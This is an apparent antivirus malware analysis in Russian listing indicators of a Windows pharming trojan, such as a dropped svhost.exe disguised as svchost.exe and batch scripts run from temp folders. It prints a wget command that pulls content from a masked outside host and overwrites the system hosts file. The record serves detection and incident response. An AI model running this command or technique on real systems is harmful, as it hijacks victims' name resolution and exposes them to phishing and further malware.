Техническая информация
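- <Текущая директория>\wget.exe http://08##.com/Vwc --output-document=<DRIVERS>\etc\hosts (загруженное содержимое записывается поверх системного файла hosts, то есть меняется локальное разрешение имён; при разборе инцидента содержимое hosts нужно проверить и восстановить)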
- %TEMP%\%temp%.exe
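- %WINDIR%\Temp\svhost.exe (имя похоже на системный svchost.exe, но отличается написанием, а сам файл лежит во временном каталоге, а не в <SYSTEM32>)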
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\pharm.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\start.bat" "
- %TEMP%\2.tmp\pharm.bat
- <Текущая директория>\wget.exe
- %TEMP%\%temp%.exe
- %WINDIR%\Temp\svhost.exe
- %TEMP%\1.tmp\start.bat
- %WINDIR%\Temp\svhost.exe
- '08##.com':80
- 08##.com/Vwc
- DNS ASK 08##.com
- ClassName: 'Shell_TrayWnd' WindowName: '' (Shell_TrayWnd — класс окна панели задач Windows)